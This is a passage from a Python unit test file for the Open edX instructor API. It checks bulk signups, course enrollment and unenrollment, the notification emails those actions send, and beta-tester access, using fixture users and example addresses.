assert data['row_errors'][0]['response'] == 'Username {user} already exists.'.format(user='test_student_1')
assert data['row_errors'][1]['response'] == 'Invalid email {email}.'.format(email='test_student4@example.com')
assert User.objects.filter(username='test_student_1', email='test_student1@example.com').exists()
assert User.objects.filter(username='test_student_2', email='test_student2@example.com').exists()
assert not User.objects.filter(email='test_student3@example.com').exists()
assert not User.objects.filter(email='test_student4@example.com').exists()
manual_enrollments = ManualEnrollmentAudit.objects.all()
assert manual_enrollments.count() == 2
@patch('lms.djangoapps.instructor.views.api', 'generate_random_string',
Mock(side_effect=['first', 'first', 'second']))
def test_generate_unique_password_no_reuse(self):
"""
generate_unique_password should generate a unique password string that hasn't been generated before.
"""
generated_password = ['first']
password = generate_unique_password(generated_password, 12)
assert password != 'first'
@patch.dict(settings.FEATURES, {'ALLOW_AUTOMATED_SIGNUPS': False})
def test_allow_automated_signups_flag_not_set(self):
csv_content = b"test_student1@example.com,test_student_1,tester1,USA"
uploaded_file = SimpleUploadedFile("temp.csv", csv_content)
response = self.client.post(self.url, {'students_list': uploaded_file})
assert response.status_code == 403
manual_enrollments = ManualEnrollmentAudit.objects.all()
assert manual_enrollments.count() == 0
@patch.dict(settings.FEATURES, {'ALLOW_AUTOMATED_SIGNUPS': True})
def test_audit_enrollment_mode(self):
"""
Test that enrollment mode for audit courses (paid courses) is 'audit'.
"""
# Login Audit Course instructor
self.client.login(username=self.audit_course_instructor.username, password='test')
csv_content = b"test_student_wl@example.com,test_student_wl,Test Student,USA"
uploaded_file = SimpleUploadedFile("temp.csv", csv_content)
response = self.client.post(self.audit_course_url, {'students_list': uploaded_file})
assert response.status_code == 200
data = json.loads(response.content.decode('utf-8'))
assert len(data['row_errors']) == 0
assert len(data['warnings']) == 0
assert len(data['general_errors']) == 0
manual_enrollments = ManualEnrollmentAudit.objects.all()
assert manual_enrollments.count() == 1
assert manual_enrollments[0].state_transition == UNENROLLED_TO_ENROLLED
# Verify enrollment modes to be 'audit'
for enrollment in manual_enrollments:
assert enrollment.enrollment.mode == CourseMode.AUDIT
@patch.dict(settings.FEATURES, {'ALLOW_AUTOMATED_SIGNUPS': True})
def test_honor_enrollment_mode(self):
"""
Test that enrollment mode for unpaid honor courses is 'honor'.
"""
# Remove white label course price
self.white_label_course_mode.min_price = 0
self.white_label_course_mode.suggested_prices = ''
self.white_label_course_mode.save()
# Login Audit Course instructor
self.client.login(username=self.white_label_course_instructor.username, password='test')
csv_content = b"test_student_wl@example.com,test_student_wl,Test Student,USA"
uploaded_file = SimpleUploadedFile("temp.csv", csv_content)
response = self.client.post(self.white_label_course_url, {'students_list': uploaded_file})
assert response.status_code == 200
data = json.loads(response.content.decode('utf-8'))
assert len(data['row_errors']) == 0
assert len(data['warnings']) == 0
assert len(data['general_errors']) == 0
manual_enrollments = ManualEnrollmentAudit.objects.all()
assert manual_enrollments.count() == 1
assert manual_enrollments[0].state_transition == UNENROLLED_TO_ENROLLED
# Verify enrollment modes to be 'honor'
for enrollment in manual_enrollments:
assert enrollment.enrollment.mode == CourseMode.HONOR
@ddt.ddt
class TestInstructorAPIEnrollment(SharedModuleStoreTestCase, LoginEnrollmentTestCase):
"""
Test enrollment modification endpoint.
This test does NOT exhaustively test state changes, that is the
job of test_enrollment. This tests the response and action switch.
"""
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.course = CourseFactory.create()
# Email URL values
cls.site_name = configuration_helpers.get_value(
'SITE_NAME',
settings.SITE_NAME
)
cls.about_path = f'/courses/{cls.course.id}/about'
cls.course_path = f'/courses/{cls.course.id}/'
def setUp(self):
super().setUp()
self.request = RequestFactory().request()
self.instructor = InstructorFactory(course_key=self.course.id)
self.client.login(username=self.instructor.username, password='test')
self.enrolled_student = UserFactory(username='EnrolledStudent', first_name='Enrolled', last_name='Student')
CourseEnrollment.enroll(
self.enrolled_student,
self.course.id
)
self.notenrolled_student = UserFactory(username='NotEnrolledStudent', first_name='NotEnrolled',
last_name='Student')
# Create invited, but not registered, user
cea = CourseEnrollmentAllowed(email='robot-allowed@robot.org', course_id=self.course.id)
cea.save()
self.allowed_email = 'robot-allowed@robot.org'
self.notregistered_email = 'robot-not-an-email-yet@robot.org'
assert User.objects.filter(email=self.notregistered_email).count() == 0
# uncomment to enable enable printing of large diffs
# from failed assertions in the event of a test failure.
# (comment because pylint C0103(invalid-name))
# self.maxDiff = None
def test_missing_params(self):
""" Test missing all query parameters. """
url = reverse('students_update_enrollment', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url)
assert response.status_code == 400
def test_bad_action(self):
""" Test with an invalid action. """
action = 'robot-not-an-action'
url = reverse('students_update_enrollment', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {'identifiers': self.enrolled_student.email, 'action': action})
assert response.status_code == 400
def test_invalid_email(self):
url = reverse('students_update_enrollment', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {'identifiers': 'percivaloctavius@', 'action': 'enroll', 'email_students': False}) # lint-amnesty, pylint: disable=line-too-long
assert response.status_code == 200
# test the response data
expected = {
"action": "enroll",
'auto_enroll': False,
"results": [
{
"identifier": 'percivaloctavius@',
"invalidIdentifier": True,
}
]
}
res_json = json.loads(response.content.decode('utf-8'))
assert res_json == expected
def test_invalid_username(self):
url = reverse('students_update_enrollment', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url,
{'identifiers': 'percivaloctavius', 'action': 'enroll', 'email_students': False})
assert response.status_code == 200
# test the response data
expected = {
"action": "enroll",
'auto_enroll': False,
"results": [
{
"identifier": 'percivaloctavius',
"invalidIdentifier": True,
}
]
}
res_json = json.loads(response.content.decode('utf-8'))
assert res_json == expected
def test_enroll_with_username(self):
url = reverse('students_update_enrollment', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {'identifiers': self.notenrolled_student.username, 'action': 'enroll',
'email_students': False})
assert response.status_code == 200
# test the response data
expected = {
"action": "enroll",
'auto_enroll': False,
"results": [
{
"identifier": self.notenrolled_student.username,
"before": {
"enrollment": False,
"auto_enroll": False,
"user": True,
"allowed": False,
},
"after": {
"enrollment": True,
"auto_enroll": False,
"user": True,
"allowed": False,
}
}
]
}
manual_enrollments = ManualEnrollmentAudit.objects.all()
assert manual_enrollments.count() == 1
assert manual_enrollments[0].state_transition == UNENROLLED_TO_ENROLLED
res_json = json.loads(response.content.decode('utf-8'))
assert res_json == expected
def test_enroll_without_email(self):
url = reverse('students_update_enrollment', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {'identifiers': self.notenrolled_student.email, 'action': 'enroll',
'email_students': False})
print("type(self.notenrolled_student.email): {}".format(type(self.notenrolled_student.email)))
assert response.status_code == 200
# test that the user is now enrolled
user = User.objects.get(email=self.notenrolled_student.email)
assert CourseEnrollment.is_enrolled(user, self.course.id)
# test the response data
expected = {
"action": "enroll",
"auto_enroll": False,
"results": [
{
"identifier": self.notenrolled_student.email,
"before": {
"enrollment": False,
"auto_enroll": False,
"user": True,
"allowed": False,
},
"after": {
"enrollment": True,
"auto_enroll": False,
"user": True,
"allowed": False,
}
}
]
}
manual_enrollments = ManualEnrollmentAudit.objects.all()
assert manual_enrollments.count() == 1
assert manual_enrollments[0].state_transition == UNENROLLED_TO_ENROLLED
res_json = json.loads(response.content.decode('utf-8'))
assert res_json == expected
# Check the outbox
assert len(mail.outbox) == 0
@ddt.data('http', 'https')
def test_enroll_with_email(self, protocol):
url = reverse('students_update_enrollment', kwargs={'course_id': str(self.course.id)})
params = {'identifiers': self.notenrolled_student.email, 'action': 'enroll', 'email_students': True}
environ = {'wsgi.url_scheme': protocol}
response = self.client.post(url, params, **environ)
print("type(self.notenrolled_student.email): {}".format(type(self.notenrolled_student.email)))
assert response.status_code == 200
# test that the user is now enrolled
user = User.objects.get(email=self.notenrolled_student.email)
assert CourseEnrollment.is_enrolled(user, self.course.id)
# test the response data
expected = {
"action": "enroll",
"auto_enroll": False,
"results": [
{
"identifier": self.notenrolled_student.email,
"before": {
"enrollment": False,
"auto_enroll": False,
"user": True,
"allowed": False,
},
"after": {
"enrollment": True,
"auto_enroll": False,
"user": True,
"allowed": False,
}
}
]
}
res_json = json.loads(response.content.decode('utf-8'))
assert res_json == expected
# Check the outbox
assert len(mail.outbox) == 1
assert mail.outbox[0].subject == f'You have been enrolled in {self.course.display_name}'
text_body = mail.outbox[0].body
html_body = mail.outbox[0].alternatives[0][0]
assert text_body.startswith('Dear NotEnrolled Student\n\n')
for body in [text_body, html_body]:
assert f'You have been enrolled in {self.course.display_name} at edx.org by a member of the course staff.'\
in body
assert 'This course will now appear on your edx.org dashboard.' in body
assert f'{protocol}://{self.site_name}{self.course_path}' in body
assert 'To start accessing course materials, please visit' in text_body
assert 'This email was automatically sent from edx.org to NotEnrolled Student\n\n' in text_body
@ddt.data('http', 'https')
def test_enroll_with_email_not_registered(self, protocol):
url = reverse('students_update_enrollment', kwargs={'course_id': str(self.course.id)})
params = {'identifiers': self.notregistered_email, 'action': 'enroll', 'email_students': True}
environ = {'wsgi.url_scheme': protocol}
response = self.client.post(url, params, **environ)
manual_enrollments = ManualEnrollmentAudit.objects.all()
assert manual_enrollments.count() == 1
assert manual_enrollments[0].state_transition == UNENROLLED_TO_ALLOWEDTOENROLL
assert response.status_code == 200
# Check the outbox
assert len(mail.outbox) == 1
assert mail.outbox[0].subject == f'You have been invited to register for {self.course.display_name}'
text_body = mail.outbox[0].body
html_body = mail.outbox[0].alternatives[0][0]
register_url = f'{protocol}://{self.site_name}/register'
assert text_body.startswith('Dear student,')
assert 'To finish your registration, please visit {register_url}'.format(
register_url=register_url,
) in text_body
assert 'Please finish your registration and fill out' in html_body
assert register_url in html_body
for body in [text_body, html_body]:
assert 'You have been invited to join {course} at edx.org by a member of the course staff.'.format(
course=self.course.display_name
) in body
assert ('fill out the registration form making sure to use '
'robot-not-an-email-yet@robot.org in the Email field') in body
assert 'Once you have registered and activated your account,' in body
assert '{proto}://{site}{about_path}'.format(
proto=protocol,
site=self.site_name,
about_path=self.about_path
) in body
assert 'This email was automatically sent from edx.org to robot-not-an-email-yet@robot.org' in body
@ddt.data('http', 'https')
@patch.dict(settings.FEATURES, {'ENABLE_MKTG_SITE': True})
def test_enroll_email_not_registered_mktgsite(self, protocol):
url = reverse('students_update_enrollment', kwargs={'course_id': str(self.course.id)})
params = {'identifiers': self.notregistered_email, 'action': 'enroll', 'email_students': True}
environ = {'wsgi.url_scheme': protocol}
response = self.client.post(url, params, **environ)
manual_enrollments = ManualEnrollmentAudit.objects.all()
assert manual_enrollments.count() == 1
assert manual_enrollments[0].state_transition == UNENROLLED_TO_ALLOWEDTOENROLL
assert response.status_code == 200
text_body = mail.outbox[0].body
html_body = mail.outbox[0].alternatives[0][0]
assert text_body.startswith('Dear student,')
assert 'To finish your registration, please visit' in text_body
assert 'Please finish your registration and fill' in html_body
for body in [text_body, html_body]:
assert 'You have been invited to join {display_name} at edx.org by a member of the course staff.'.format(
display_name=self.course.display_name
) in body
assert '{proto}://{site}/register'.format(
proto=protocol,
site=self.site_name
) in body
assert ('fill out the registration form making sure to use '
'robot-not-an-email-yet@robot.org in the Email field') in body
assert 'You can then enroll in {display_name}.'.format(
display_name=self.course.display_name
) in body
assert 'This email was automatically sent from edx.org to robot-not-an-email-yet@robot.org' in body
@ddt.data('http', 'https')
def test_enroll_with_email_not_registered_autoenroll(self, protocol):
url = reverse('students_update_enrollment', kwargs={'course_id': str(self.course.id)})
params = {'identifiers': self.notregistered_email, 'action': 'enroll', 'email_students': True,
'auto_enroll': True}
environ = {'wsgi.url_scheme': protocol}
response = self.client.post(url, params, **environ)
print("type(self.notregistered_email): {}".format(type(self.notregistered_email)))
assert response.status_code == 200
# Check the outbox
assert len(mail.outbox) == 1
assert mail.outbox[0].subject == f'You have been invited to register for {self.course.display_name}'
manual_enrollments = ManualEnrollmentAudit.objects.all()
assert manual_enrollments.count() == 1
assert manual_enrollments[0].state_transition == UNENROLLED_TO_ALLOWEDTOENROLL
text_body = mail.outbox[0].body
html_body = mail.outbox[0].alternatives[0][0]
register_url = '{proto}://{site}/register'.format(
proto=protocol,
site=self.site_name,
)
assert text_body.startswith('Dear student,')
assert 'To finish your registration, please visit {register_url}'.format(
register_url=register_url,
) in text_body
assert 'Please finish your registration and fill out the registration' in html_body
assert 'Finish Your Registration' in html_body
assert register_url in html_body
for body in [text_body, html_body]:
assert 'You have been invited to join {display_name} at edx.org by a member of the course staff.'.format(
display_name=self.course.display_name
) in body
assert (' and fill '
'out the registration form making sure to use robot-not-an-email-yet@robot.org '
'in the Email field') in body
assert ('Once you have registered and activated your account, '
'you will see {display_name} listed on your dashboard.').format(
display_name=self.course.display_name
) in body
assert 'This email was automatically sent from edx.org to robot-not-an-email-yet@robot.org' in body
def test_unenroll_without_email(self):
url = reverse('students_update_enrollment', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {'identifiers': self.enrolled_student.email, 'action': 'unenroll',
'email_students': False})
print("type(self.enrolled_student.email): {}".format(type(self.enrolled_student.email)))
assert response.status_code == 200
# test that the user is now unenrolled
user = User.objects.get(email=self.enrolled_student.email)
assert not CourseEnrollment.is_enrolled(user, self.course.id)
# test the response data
expected = {
"action": "unenroll",
"auto_enroll": False,
"results": [
{
"identifier": self.enrolled_student.email,
"before": {
"enrollment": True,
"auto_enroll": False,
"user": True,
"allowed": False,
},
"after": {
"enrollment": False,
"auto_enroll": False,
"user": True,
"allowed": False,
}
}
]
}
manual_enrollments = ManualEnrollmentAudit.objects.all()
assert manual_enrollments.count() == 1
assert manual_enrollments[0].state_transition == ENROLLED_TO_UNENROLLED
res_json = json.loads(response.content.decode('utf-8'))
assert res_json == expected
# Check the outbox
assert len(mail.outbox) == 0
def test_unenroll_with_email(self):
url = reverse('students_update_enrollment', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {'identifiers': self.enrolled_student.email, 'action': 'unenroll',
'email_students': True})
print("type(self.enrolled_student.email): {}".format(type(self.enrolled_student.email)))
assert response.status_code == 200
# test that the user is now unenrolled
user = User.objects.get(email=self.enrolled_student.email)
assert not CourseEnrollment.is_enrolled(user, self.course.id)
# test the response data
expected = {
"action": "unenroll",
"auto_enroll": False,
"results": [
{
"identifier": self.enrolled_student.email,
"before": {
"enrollment": True,
"auto_enroll": False,
"user": True,
"allowed": False,
},
"after": {
"enrollment": False,
"auto_enroll": False,
"user": True,
"allowed": False,
}
}
]
}
manual_enrollments = ManualEnrollmentAudit.objects.all()
assert manual_enrollments.count() == 1
assert manual_enrollments[0].state_transition == ENROLLED_TO_UNENROLLED
res_json = json.loads(response.content.decode('utf-8'))
assert res_json == expected
# Check the outbox
assert len(mail.outbox) == 1
assert mail.outbox[0].subject == f'You have been unenrolled from {self.course.display_name}'
text_body = mail.outbox[0].body
html_body = mail.outbox[0].alternatives[0][0]
assert text_body.startswith('Dear Enrolled Student')
for body in [text_body, html_body]:
assert 'You have been unenrolled from {display_name} at edx.org by a member of the course staff.'.format(
display_name=self.course.display_name,
) in body
assert 'This course will no longer appear on your edx.org dashboard.' in body
assert 'Your other courses have not been affected.' in body
assert 'This email was automatically sent from edx.org to Enrolled Student' in body
def test_unenroll_with_email_allowed_student(self):
url = reverse('students_update_enrollment', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url,
{'identifiers': self.allowed_email, 'action': 'unenroll', 'email_students': True})
print(u"type(self.allowed_email): {}".format(type(self.allowed_email)))
assert response.status_code == 200
# test the response data
expected = {
"action": "unenroll",
"auto_enroll": False,
"results": [
{
"identifier": self.allowed_email,
"before": {
"enrollment": False,
"auto_enroll": False,
"user": False,
"allowed": True,
},
"after": {
"enrollment": False,
"auto_enroll": False,
"user": False,
"allowed": False,
}
}
]
}
manual_enrollments = ManualEnrollmentAudit.objects.all()
assert manual_enrollments.count() == 1
assert manual_enrollments[0].state_transition == ALLOWEDTOENROLL_TO_UNENROLLED
res_json = json.loads(response.content.decode('utf-8'))
assert res_json == expected
# Check the outbox
assert len(mail.outbox) == 1
assert mail.outbox[0].subject == f'You have been unenrolled from {self.course.display_name}'
text_body = mail.outbox[0].body
html_body = mail.outbox[0].alternatives[0][0]
assert text_body.startswith('Dear Student,')
for body in [text_body, html_body]:
assert 'You have been unenrolled from the course {display_name} by a member of the course staff.'.format(
display_name=self.course.display_name,
) in body
assert 'Please disregard the invitation previously sent.' in body
assert 'This email was automatically sent from edx.org to robot-allowed@robot.org' in body
@ddt.data('http', 'https')
@patch('lms.djangoapps.instructor.enrollment.uses_shib')
def test_enroll_with_email_not_registered_with_shib(self, protocol, mock_uses_shib):
mock_uses_shib.return_value = True
url = reverse('students_update_enrollment', kwargs={'course_id': str(self.course.id)})
params = {'identifiers': self.notregistered_email, 'action': 'enroll', 'email_students': True}
environ = {'wsgi.url_scheme': protocol}
response = self.client.post(url, params, **environ)
assert response.status_code == 200
# Check the outbox
assert len(mail.outbox) == 1
assert mail.outbox[0].subject == f'You have been invited to register for {self.course.display_name}'
text_body = mail.outbox[0].body
html_body = mail.outbox[0].alternatives[0][0]
course_url = '{proto}://{site}{about_path}'.format(
proto=protocol,
site=self.site_name,
about_path=self.about_path,
)
assert text_body.startswith('Dear student,')
assert 'To access this course visit {course_url} and register for this course.'.format(
course_url=course_url,
) in text_body
assert 'To access this course visit it and register:' in html_body
assert course_url in html_body
for body in [text_body, html_body]:
assert 'You have been invited to join {display_name} at edx.org by a member of the course staff.'.format(
display_name=self.course.display_name,
) in body
assert 'This email was automatically sent from edx.org to robot-not-an-email-yet@robot.org' in body
@patch('lms.djangoapps.instructor.enrollment.uses_shib')
@patch.dict(settings.FEATURES, {'ENABLE_MKTG_SITE': True})
def test_enroll_email_not_registered_shib_mktgsite(self, mock_uses_shib):
# Try with marketing site enabled and shib on
mock_uses_shib.return_value = True
url = reverse('students_update_enrollment', kwargs={'course_id': str(self.course.id)})
# Try with marketing site enabled
with patch.dict('django.conf.settings.FEATURES', {'ENABLE_MKTG_SITE': True}):
response = self.client.post(url, {'identifiers': self.notregistered_email, 'action': 'enroll',
'email_students': True})
assert response.status_code == 200
text_body = mail.outbox[0].body
html_body = mail.outbox[0].alternatives[0][0]
assert text_body.startswith('Dear student,')
for body in [text_body, html_body]:
assert 'You have been invited to join {display_name} at edx.org by a member of the course staff.'.format(
display_name=self.course.display_name,
) in body
assert 'This email was automatically sent from edx.org to robot-not-an-email-yet@robot.org' in body
@ddt.data('http', 'https')
@patch('lms.djangoapps.instructor.enrollment.uses_shib')
def test_enroll_with_email_not_registered_with_shib_autoenroll(self, protocol, mock_uses_shib):
mock_uses_shib.return_value = True
url = reverse('students_update_enrollment', kwargs={'course_id': str(self.course.id)})
params = {'identifiers': self.notregistered_email, 'action': 'enroll', 'email_students': True,
'auto_enroll': True}
environ = {'wsgi.url_scheme': protocol}
response = self.client.post(url, params, **environ)
print("type(self.notregistered_email): {}".format(type(self.notregistered_email)))
assert response.status_code == 200
# Check the outbox
assert len(mail.outbox) == 1
assert mail.outbox[0].subject == f'You have been invited to register for {self.course.display_name}'
text_body = mail.outbox[0].body
html_body = mail.outbox[0].alternatives[0][0]
course_url = '{proto}://{site}{course_path}'.format(
proto=protocol, site=self.site_name, course_path=self.course_path,
)
assert text_body.startswith('Dear student,')
assert course_url in html_body
assert f'To access this course visit {course_url} and login.' in text_body
assert 'To access this course click on the button below and login:' in html_body
for body in [text_body, html_body]:
assert 'You have been invited to join {display_name} at edx.org by a member of the course staff.'.format(
display_name=self.course.display_name,
) in body
assert 'This email was automatically sent from edx.org to robot-not-an-email-yet@robot.org' in body
def test_enroll_already_enrolled_student(self):
"""
Ensure that already enrolled "verified" students cannot be downgraded
to "honor"
"""
course_enrollment = CourseEnrollment.objects.get(
user=self.enrolled_student, course_id=self.course.id
)
# make this enrollment "verified"
course_enrollment.mode = 'verified'
course_enrollment.save()
assert course_enrollment.mode == 'verified'
# now re-enroll the student through the instructor dash
self._change_student_enrollment(self.enrolled_student, self.course, 'enroll')
# affirm that the student is still in "verified" mode
course_enrollment = CourseEnrollment.objects.get(
user=self.enrolled_student, course_id=self.course.id
)
manual_enrollments = ManualEnrollmentAudit.objects.all()
assert manual_enrollments.count() == 1
assert manual_enrollments[0].state_transition == ENROLLED_TO_ENROLLED
assert course_enrollment.mode == 'verified'
def create_paid_course(self):
"""
create paid course mode.
"""
paid_course = CourseFactory.create()
CourseModeFactory.create(course_id=paid_course.id, min_price=50, mode_slug=CourseMode.HONOR)
CourseInstructorRole(paid_course.id).add_users(self.instructor)
return paid_course
def test_unenrolled_allowed_to_enroll_user(self):
"""
test to unenroll allow to enroll user.
"""
paid_course = self.create_paid_course()
url = reverse('students_update_enrollment', kwargs={'course_id': str(paid_course.id)})
params = {'identifiers': self.notregistered_email, 'action': 'enroll', 'email_students': False,
'auto_enroll': False, 'reason': 'testing..', 'role': 'Learner'}
response = self.client.post(url, params)
manual_enrollments = ManualEnrollmentAudit.objects.all()
assert manual_enrollments.count() == 1
assert manual_enrollments[0].state_transition == UNENROLLED_TO_ALLOWEDTOENROLL
assert response.status_code == 200
# now registered the user
UserFactory(email=self.notregistered_email)
url = reverse('students_update_enrollment', kwargs={'course_id': str(paid_course.id)})
params = {'identifiers': self.notregistered_email, 'action': 'enroll', 'email_students': False,
'auto_enroll': False, 'reason': 'testing', 'role': 'Learner'}
response = self.client.post(url, params)
manual_enrollments = ManualEnrollmentAudit.objects.all()
assert manual_enrollments.count() == 2
assert manual_enrollments[1].state_transition == ALLOWEDTOENROLL_TO_ENROLLED
assert response.status_code == 200
# test the response data
expected = {
"action": "enroll",
"auto_enroll": False,
"results": [
{
"identifier": self.notregistered_email,
"before": {
"enrollment": False,
"auto_enroll": False,
"user": True,
"allowed": True,
},
"after": {
"enrollment": True,
"auto_enroll": False,
"user": True,
"allowed": True,
}
}
]
}
res_json = json.loads(response.content.decode('utf-8'))
assert res_json == expected
def test_unenrolled_already_not_enrolled_user(self):
"""
test unenrolled user already not enrolled in a course.
"""
paid_course = self.create_paid_course()
course_enrollment = CourseEnrollment.objects.filter(
user__email=self.notregistered_email, course_id=paid_course.id
)
assert course_enrollment.count() == 0
url = reverse('students_update_enrollment', kwargs={'course_id': str(paid_course.id)})
params = {'identifiers': self.notregistered_email, 'action': 'unenroll', 'email_students': False,
'auto_enroll': False, 'reason': 'testing', 'role': 'Learner'}
response = self.client.post(url, params)
assert response.status_code == 200
# test the response data
expected = {
"action": "unenroll",
"auto_enroll": False,
"results": [
{
"identifier": self.notregistered_email,
"before": {
"enrollment": False,
"auto_enroll": False,
"user": False,
"allowed": False,
},
"after": {
"enrollment": False,
"auto_enroll": False,
"user": False,
"allowed": False,
}
}
]
}
manual_enrollments = ManualEnrollmentAudit.objects.all()
assert manual_enrollments.count() == 1
assert manual_enrollments[0].state_transition == UNENROLLED_TO_UNENROLLED
res_json = json.loads(response.content.decode('utf-8'))
assert res_json == expected
def test_unenroll_and_enroll_verified(self):
"""
Test that unenrolling and enrolling a student from a verified track
results in that student being in the default track
"""
course_enrollment = CourseEnrollment.objects.get(
user=self.enrolled_student, course_id=self.course.id
)
# upgrade enrollment
course_enrollment.mode = 'verified'
course_enrollment.save()
assert course_enrollment.mode == 'verified'
self._change_student_enrollment(self.enrolled_student, self.course, 'unenroll')
self._change_student_enrollment(self.enrolled_student, self.course, 'enroll')
course_enrollment = CourseEnrollment.objects.get(
user=self.enrolled_student, course_id=self.course.id
)
assert course_enrollment.mode == CourseMode.DEFAULT_MODE_SLUG
def test_reason_is_persisted(self):
"""
test that reason field is persisted in the database
"""
paid_course = self.create_paid_course()
url = reverse('students_update_enrollment', kwargs={'course_id': str(paid_course.id)})
params = {'identifiers': self.notregistered_email, 'action': 'enroll', 'email_students': False,
'auto_enroll': False, 'reason': 'testing'}
response = self.client.post(url, params)
manual_enrollment = ManualEnrollmentAudit.objects.first()
assert manual_enrollment.reason == 'testing'
assert response.status_code == 200
def _change_student_enrollment(self, user, course, action):
"""
Helper function that posts to 'students_update_enrollment' to change
a student's enrollment
"""
url = reverse(
'students_update_enrollment',
kwargs={'course_id': str(course.id)},
)
params = {
'identifiers': user.email,
'action': action,
'email_students': True,
'reason': 'change user enrollment',
'role': 'Learner'
}
response = self.client.post(url, params)
assert response.status_code == 200
return response
def test_get_enrollment_status(self):
"""Check that enrollment states are reported correctly."""
# enrolled, active
url = reverse(
'get_student_enrollment_status',
kwargs={'course_id': str(self.course.id)},
)
params = {
'unique_student_identifier': 'EnrolledStudent'
}
response = self.client.post(url, params)
assert response.status_code == 200
res_json = json.loads(response.content.decode('utf-8'))
assert res_json['enrollment_status'] == 'Enrollment status for EnrolledStudent: active'
# unenrolled, inactive
CourseEnrollment.unenroll(
self.enrolled_student,
self.course.id
)
response = self.client.post(url, params)
assert response.status_code == 200
res_json = json.loads(response.content.decode('utf-8'))
assert res_json['enrollment_status'] == 'Enrollment status for EnrolledStudent: inactive'
# invited, not yet registered
params = {
'unique_student_identifier': 'robot-allowed@robot.org'
}
response = self.client.post(url, params)
assert response.status_code == 200
res_json = json.loads(response.content.decode('utf-8'))
assert res_json['enrollment_status'] == 'Enrollment status for robot-allowed@robot.org: pending'
# never enrolled or invited
params = {
'unique_student_identifier': 'nonotever@example.com'
}
response = self.client.post(url, params)
assert response.status_code == 200
res_json = json.loads(response.content.decode('utf-8'))
assert res_json['enrollment_status'] == 'Enrollment status for nonotever@example.com: never enrolled'
@ddt.ddt
class TestInstructorAPIBulkBetaEnrollment(SharedModuleStoreTestCase, LoginEnrollmentTestCase):
"""
Test bulk beta modify access endpoint.
"""
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.course = CourseFactory.create()
# Email URL values
cls.site_name = configuration_helpers.get_value(
'SITE_NAME',
settings.SITE_NAME
)
cls.about_path = f'/courses/{cls.course.id}/about'
cls.course_path = f'/courses/{cls.course.id}/'
def setUp(self):
super().setUp()
self.instructor = InstructorFactory(course_key=self.course.id)
self.client.login(username=self.instructor.username, password='test')
self.beta_tester = BetaTesterFactory(course_key=self.course.id)
CourseEnrollment.enroll(
self.beta_tester,
self.course.id
)
assert CourseBetaTesterRole(self.course.id).has_user(self.beta_tester)
self.notenrolled_student = UserFactory(username='NotEnrolledStudent')
self.notregistered_email = 'robot-not-an-email-yet@robot.org'
assert User.objects.filter(email=self.notregistered_email).count() == 0
self.request = RequestFactory().request()
# uncomment to enable enable printing of large diffs
# from failed assertions in the event of a test failure.
# (comment because pylint C0103(invalid-name))
# self.maxDiff = None
def test_beta_tester_must_not_earn_cert(self):
"""
Test to ensure that beta tester must not earn certificate in a course
in which he/she is a beta-tester.
"""
with LogCapture() as capture:
message = 'Cancelling course certificate generation for user [{}] against course [{}], ' \
'user is a Beta Tester.'
message = message.format(self.beta_tester.username, self.course.id)
generate_user_certificates(self.beta_tester, self.course.id, self.course)
capture.check_present(('lms.djangoapps.certificates.generation_handler', 'INFO', message))
def test_missing_params(self):
""" Test missing all query parameters. """
url = reverse('bulk_beta_modify_access', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url)
assert response.status_code == 400
def test_bad_action(self):
""" Test with an invalid action. """
action = 'robot-not-an-action'
url = reverse('bulk_beta_modify_access', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {'identifiers': self.beta_tester.email, 'action': action})
assert response.status_code == 400
def add_notenrolled(self, response, identifier):
"""
Test Helper Method (not a test, called by other tests)
Takes a client response from a call to bulk_beta_modify_access with 'email_students': False,
and the student identifier (email or username) given as 'identifiers' in the request.
Asserts the reponse returns cleanly, that the student was added as a beta tester, and the
response properly contains their identifier, 'error': False, and 'userDoesNotExist': False.
Additionally asserts no email was sent.
"""
assert response.status_code == 200
assert CourseBetaTesterRole(self.course.id).has_user(self.notenrolled_student)
# test the response data
expected = {
"action": "add",
"results": [
{
"identifier": identifier,
"error": False,
"userDoesNotExist": False,
"is_active": True
}
]
}
res_json = json.loads(response.content.decode('utf-8'))
assert res_json == expected
# Check the outbox
assert len(mail.outbox) == 0
def test_add_notenrolled_email(self):
url = reverse('bulk_beta_modify_access', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {'identifiers': self.notenrolled_student.email, 'action': 'add', 'email_students': False}) # lint-amnesty, pylint: disable=line-too-long
self.add_notenrolled(response, self.notenrolled_student.email)
assert not CourseEnrollment.is_enrolled(self.notenrolled_student, self.course.id)
def test_add_notenrolled_email_autoenroll(self):
url = reverse('bulk_beta_modify_access', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {'identifiers': self.notenrolled_student.email, 'action': 'add', 'email_students': False, 'auto_enroll': True}) # lint-amnesty, pylint: disable=line-too-long
self.add_notenrolled(response, self.notenrolled_student.email)
assert CourseEnrollment.is_enrolled(self.notenrolled_student, self.course.id)
def test_add_notenrolled_username(self):
url = reverse('bulk_beta_modify_access', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {'identifiers': self.notenrolled_student.username, 'action': 'add', 'email_students': False}) # lint-amnesty, pylint: disable=line-too-long
self.add_notenrolled(response, self.notenrolled_student.username)
assert not CourseEnrollment.is_enrolled(self.notenrolled_student, self.course.id)
def test_add_notenrolled_username_autoenroll(self):
url = reverse('bulk_beta_modify_access', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {'identifiers': self.notenrolled_student.username, 'action': 'add', 'email_students': False, 'auto_enroll': True}) # lint-amnesty, pylint: disable=line-too-long
self.add_notenrolled(response, self.notenrolled_student.username)
assert CourseEnrollment.is_enrolled(self.notenrolled_student, self.course.id)
@ddt.data('http', 'https')
def test_add_notenrolled_with_email(self, protocol):
url = reverse('bulk_beta_modify_access', kwargs={'course_id': str(self.course.id)})
params = {'identifiers': self.notenrolled_student.email, 'action': 'add', 'email_students': True}
environ = {'wsgi.url_scheme': protocol}
response = self.client.post(url, params, **environ)
